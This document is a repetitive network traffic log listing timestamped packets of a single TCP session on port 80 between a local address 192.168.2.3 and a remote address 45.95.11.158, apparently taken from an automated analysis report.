Aug 23, 2022 18:24:04.508280993 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.508306980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508316994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.508346081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508354902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.508462906 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.509562016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.509660959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520579100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520628929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520667076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520679951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520704985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520709038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520754099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520756960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520770073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520792961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520816088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520833015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520857096 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520872116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520886898 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520911932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520936966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520944118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.520977974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.520982981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.521001101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.521023989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.521042109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.521065950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.521094084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.521131992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.521178961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.524106979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.524167061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.524185896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.524219990 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.524224997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.524257898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.524277925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.524329901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.538300037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.538347960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.538388968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.538412094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.538417101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.538450003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.538467884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.538583040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.538625002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.538661957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.538662910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.538691044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.538718939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.538976908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539020061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539058924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539066076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.539083004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.539124012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.539257050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539297104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539304018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.539335966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539397955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.539438009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539508104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539534092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.539546967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.539575100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.539603949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540026903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540066957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540097952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540107012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540113926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540146112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540183067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540185928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540194988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540225983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540265083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540278912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540302992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540329933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540344954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540357113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540384054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540422916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540438890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540461063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540469885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540494919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540508032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540558100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540731907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540770054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540795088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540812016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.540837049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.540874958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.541055918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.541111946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.541260004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.541301966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.541341066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.541358948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.541387081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.541439056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.541831017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.541871071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.541910887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.541913033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.541924953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.541965008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.542139053 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.542181969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.542200089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.542221069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.542273045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.542356014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.543066025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556212902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556278944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556288004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556323051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556348085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556354046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556442022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556446075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556484938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556528091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556545973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556567907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556612015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556634903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556644917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556695938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556703091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556740999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556782007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556821108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556823015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556859970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556889057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556909084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.556971073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.556978941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.558114052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.558161020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.558192968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.558201075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.558212996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.558264017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.558398008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.558733940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.570419073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.570465088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.570498943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.570502996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.570525885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.570532084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.570585012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.570657015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.570698023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.570708990 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.570740938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.570761919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.570813894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.570872068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.571371078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571444035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571476936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.571489096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571517944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571537971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.571567059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.571572065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571614027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571654081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571666002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.571681976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571702957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.571722984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571739912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.571762085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571803093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571813107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.571830034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.571882010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572093964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572134972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572149038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572173119 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572196960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572221041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572242022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572282076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572320938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572331905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572400093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572438002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572454929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572477102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572484016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572516918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572526932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572545052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572565079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572583914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572587967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572623014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572662115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572674036 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.572700024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.572707891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.573188066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575527906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575582981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575622082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575627089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575668097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575690031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575731039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575731993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575766087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575773001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575784922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575814009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575824022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575846910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575861931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575887918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575896978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575926065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575941086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.575965881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.575969934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.576004982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.576045036 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.576050997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.576083899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.576086044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.576113939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.576131105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.576169014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591053009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591129065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591150999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591171980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591182947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591195107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591207027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591211081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591217041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591239929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591260910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591264963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591275930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591284037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591300011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.591312885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591331959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591356039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.591993093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.592029095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.592082977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.592098951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.592118025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.592142105 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.592154980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.592165947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.592181921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.592202902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.592231035 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.603874922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.603914976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.603939056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.603956938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.603960991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.603980064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604005098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604027987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604033947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604043961 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604048014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604051113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604073048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604613066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604640961 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604664087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604688883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604703903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604722977 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604746103 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604793072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604821920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604846001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604868889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604870081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604885101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604898930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604918957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604923964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604938984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604948044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.604959965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.604985952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.605384111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605406046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605431080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605453014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605464935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.605477095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605490923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.605493069 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605511904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.605535984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.605806112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605835915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605856895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.605881929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.605902910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.605907917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.606288910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.606316090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.606338024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.606343985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.606357098 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.606379986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.606638908 CEST	80	49827	45.95.11.158	192.168.2.3
